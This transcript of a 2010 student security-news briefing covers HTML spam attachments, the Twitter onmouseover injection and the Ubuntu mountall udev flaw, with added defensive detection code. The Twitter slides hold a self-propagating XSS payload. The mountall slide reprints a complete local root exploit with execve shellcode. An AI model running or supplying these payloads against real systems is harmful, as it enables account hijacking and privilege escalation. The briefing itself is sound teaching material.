Information Security News Briefing

Information Security News Briefing. Presenters: 曾家雄, 劉旭哲, 莊承恩. Outline. Spammers Hit Email Users with New HTML Attack – 家雄 Script Injection – Twitter – 旭哲 Ubuntu Linux ‘mountall’ Local Privilege Escalation Vulnerability – 承恩. SPAMMERS HIT EMAIL USERS WITH NEW HTML ATTACK. John E Dunn, TechWorld September 24, 2010.


Presentation Transcript


  1. Information Security News Briefing • Presenters: 曾家雄, 劉旭哲, 莊承恩

  2. Outline • Spammers Hit Email Users with New HTML Attack – 家雄 • Script Injection – Twitter – 旭哲 • Ubuntu Linux ‘mountall’ Local Privilege Escalation Vulnerability – 承恩

  3. SPAMMERS HIT EMAIL USERS WITH NEW HTML ATTACK John E Dunn, TechWorld September 24, 2010

  4. Introduction • Spammers have suddenly cranked up the use of malicious HTML file attachments in recent days • The latest campaign tries to get recipients to click on 'harmless' HTML attachments, which launch an obfuscated JavaScript attack that sends users to a variety of websites peddling everything from bogus CODECS to pharmacy

  5. Introduction • Spam built around html is nothing new, but does seem to have become a hot technique in the last year or so with some spammers • A popular variant is the bogus 'Delivery Status Notification Failure', a sneaky way to get the attention of a user without arousing suspicion • More recently still, the spammers started embedding the Javascript inside the html file (rather than as a simple file attachment), to spread the horrible Zeus banking Trojan

  6. Introduction • Users have been warned of the potential dangers associated with clicking on a file or link that arrives in an email • But many people assume that an HTML file is just a webpage and that webpages are safe • This assumption is misleading, and HTML attachments are just as serious of a threat as other attachment types

  7. Introduction • Google hot topic search results frequently are littered with links to hacked sites that serve up malicious JavaScript • Now, the attackers are taking that a step further and not requiring the user to come to their hacked sites but rather simply emailing the same malicious JavaScript sites straight to an inbox

  8. Google Hot Topic Search Results

  9. With Messages to Match

  10. HTML Doesn’t Seem So Harmless • The attachments include 100% obfuscated JavaScript – JavaScript deliberately made confusing to read or scan in order to make it harder for anti-virus products to identify it

  11. The fake pharmacy site

  12. The fake codec site

  13. The fake anti-virus site

  14. HTML behind the fake anti-virus site

  15. What Makes a Real Problem • Although the fake anti-virus site can be defeated by simply terminating the browser, the backdoor has already quietly been installed

  16. Zeus Banking Trojan

  17. Zeus Banking Trojan

  18. Conclusion • "So yes, a seemingly innocent HTML email attachment can do plenty of damage, and while quite stealthy, definitely not harmless," concludes Barracuda Labs' researcher, Dave Michmerhuizen

  19. Reference • http://www.barracudalabs.com/wordpress/index.php/2010/09/23/html-is-not-harmless-email-security-update/ • http://www.networkworld.com/news/2010/092410-spammers-hit-email-users-with.html?hpg1=bn
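
A mail-gateway triage sketch for the HTML attachments described in this talk, as an added example that is not part of the original slides or the Barracuda Labs write-up. The marker list, the 200-character token threshold and the sample message are assumptions constructed for illustration.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Assumed heuristic markers of packed/obfuscated JavaScript (not taken from the article).
MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def triage_html_attachments(raw_message):
    """Return one finding per HTML attachment in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        if not (is_html or name.lower().endswith((".htm", ".html"))):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        scripts = SCRIPT_RE.findall(body)
        markers = sorted({m for s in scripts for m in MARKERS if m in s})
        longest = max((len(t) for s in scripts for t in s.split()), default=0)
        findings.append({
            "filename": name,
            "script_blocks": len(scripts),
            "markers": markers,
            "longest_token": longest,
            # Flag scripts that decode-and-run, or that carry one huge packed token.
            "suspicious": bool(markers) or longest > 200,
        })
    return findings

def build_sample():
    """Constructed message: one attachment with a harmless packed script, one plain page."""
    m = EmailMessage()
    m["Subject"] = "Delivery Status Notification (Failure)"
    m.set_content("See the attached report.")
    m.add_attachment("<html><script>var s=unescape('%76%61%72%20%78');eval(s);</script></html>",
                     subtype="html", filename="report.html")
    m.add_attachment("<html><body><p>Meeting notes</p></body></html>",
                     subtype="html", filename="notes.html")
    return m.as_bytes()

if __name__ == "__main__":
    for finding in triage_html_attachments(build_sample()):
        print(finding)
```

A hit is a reason to quarantine or detonate the attachment in a sandbox, not a verdict; legitimate pages also use some of these calls.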

  20. SCRIPT INJECTION - TWITTER

  21. 9/21: An attacker used an exploit to post a message • When a victim moves the mouse over the message, it is sent out again automatically • But how?

  22. When you post a URL, Twitter wraps it like this: • <a href="YOUR_LINK" class="tweet-url" rel="nofollow" target="_blank">YOUR_LINK</a>

  23. If your URL looks like this… • http://www.ncu.edu.tw "onmouseover=alert('Injection!') • The URL is not sanitized

  24. Therefore, in the resulting HTML… • <a href="http://www.ncu.edu.tw "onmouseover=alert('Injection!')//" class="tweet-url" rel="nofollow" target="_blank">http://www.ncu.edu.tw //" onmouseover=alert('Injection!')</a>

  25. http://a.bc/@"onmouseover="document.getElementById('status').value='RT YourTwitterId'; $('.status-update-form').submit();" class="modal-overlay"/

  26. http://www.ithome.com.tw/itadm/article.php?c=63493 • http://blog.trendmicro.com/twitter-mouseover-flaw-allows-script-injection/ • http://www.technewsworld.com/story/70880.html • http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html
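
The link wrapping from slides 22 to 24 next to an escaped version, as an added example that is not Twitter's code or part of the original slides. The function names are hypothetical, and the http/https scheme check is an extra hardening step the slides do not discuss.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

TEMPLATE = '<a href="{0}" class="tweet-url" rel="nofollow" target="_blank">{1}</a>'

# The alert() test string from slides 23-24.
SAMPLE = "http://www.ncu.edu.tw \"onmouseover=alert('Injection!')//"

def wrap_unsafe(url):
    """Paste the URL into the attribute verbatim, as on slide 24."""
    return TEMPLATE.format(url, url)

def wrap_escaped(url):
    """Encode the URL for an HTML attribute so a quote cannot end the value."""
    if urlsplit(url).scheme not in ("http", "https"):
        raise ValueError("only http/https links are wrapped")
    safe = html.escape(url, quote=True)  # & < > " ' become character references
    return TEMPLATE.format(safe, safe)

class _FirstAnchor(HTMLParser):
    """Record the attributes of the first <a> tag as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)

def anchor_attrs(markup):
    parser = _FirstAnchor()
    parser.feed(markup)
    return parser.attrs

if __name__ == "__main__":
    # Unsafe: the quote closes href and onmouseover becomes its own attribute.
    print(sorted(anchor_attrs(wrap_unsafe(SAMPLE))))
    # Escaped: the whole string stays inside href; no event handler exists.
    print(sorted(anchor_attrs(wrap_escaped(SAMPLE))))
```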

  27. UBUNTU LINUX 'MOUNTALL' LOCAL PRIVILEGE ESCALATION VULNERABILITY

  28. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • mountall: filesystem mounting tool • mounts filesystems once the underlying devices have been created by udevd • udev: • a way of managing the /dev directory (which stores file-like device nodes) • to create and name /dev device nodes corresponding to devices, udev relies on matching information provided by sysfs with rules provided by the user

  29. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • mountall creates /dev/.udev/rules.d/root.rules as world-writable • -rw-rw-rw- 1 root root 70 2010-06-09 07:31 /dev/.udev/rules.d/root.rules • udev rules allow a user to run a program • Local attackers can exploit this issue to execute arbitrary commands as the 'root' user • CVSS v2 Base Score: 6.9

  30. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability

      #!/bin/sh
      # by fuzz. For Anux inc. #
      # ubuntu 10.04 , 10.10
      if [ -z "$1" ]
      then
      echo "usage: $0 <UDEV KERNEL EVENT>"
      echo "see here http://www.reactivated.net/writing_udev_rules.html"
      exit
      fi
      cat > usn985-exploit.sh << EOF
      #!/bin/sh
      chown root:root $PWD/usn985-sc
      chmod +s $PWD/usn985-sc
      EOF
      cat > usn985-sc.c << EOF
      char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
      "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
      main(){int *r;*((int *)&r+2)=(int)s;}
      EOF
      gcc usn985-sc.c -o usn985-sc
      echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
      chmod +x usn985-exploit.sh
      echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
      echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"

  31. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • [Diagram: start.sh, usn985-sc.c, usn985-sc, usn985-exploit.sh, /dev/.udev/rules.d/root.rules and udevd, connected by arrows labelled Gen., Mod., chmod, Add, Read, Trigger and Run]

  32. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • DEMO

  33. Reference • http://www.exploit-db.com/exploits/15074/ • http://www.reactivated.net/writing_udev_rules.html#external-run • http://blog.chinaunix.net/u1/56723/showart_479390.html
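
A permission audit for the condition shown on slide 29, as an added example that is not part of the original slides or the referenced exploit. The function names and the sample rule text are constructed for illustration; on a real host the directory to check would be /dev/.udev/rules.d.

```python
import os
import stat
import tempfile

def audit_udev_rules(rules_dir):
    """Report rules files that someone other than the owner can write to."""
    findings = []
    for name in sorted(os.listdir(rules_dir)):
        path = os.path.join(rules_dir, name)
        st = os.lstat(path)  # lstat: judge the entry itself, not a symlink target
        if not stat.S_ISREG(st.st_mode):
            continue
        if not stat.S_IMODE(st.st_mode) & (stat.S_IWGRP | stat.S_IWOTH):
            continue
        with open(path, errors="replace") as fh:
            # Count active RUN keys: each is a program udevd would start.
            run_keys = sum(1 for line in fh
                           if "RUN" in line and not line.lstrip().startswith("#"))
        findings.append({
            "file": name,
            "mode": stat.filemode(st.st_mode),  # same form as the ls -l line on slide 29
            "owner_uid": st.st_uid,
            "run_keys": run_keys,
        })
    return findings

def build_sample_dir():
    """Constructed rules directory: one world-writable file, one root-only-style file."""
    d = tempfile.mkdtemp(prefix="udev-rules-")
    samples = {
        "root.rules": (0o666, 'SUBSYSTEM=="block", SYMLINK+="root"\n'),
        "60-local.rules": (0o644, 'KERNEL=="ttyUSB0", RUN+="/usr/local/bin/placeholder"\n'),
    }
    for name, (mode, text) in samples.items():
        path = os.path.join(d, name)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, mode)  # set explicitly so the process umask does not matter
    return d

if __name__ == "__main__":
    for finding in audit_udev_rules(build_sample_dir()):
        print(finding)
```

Any file this reports should be restricted to owner-only write; a nonzero `run_keys` in such a file is a reason to review its contents before trusting it.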
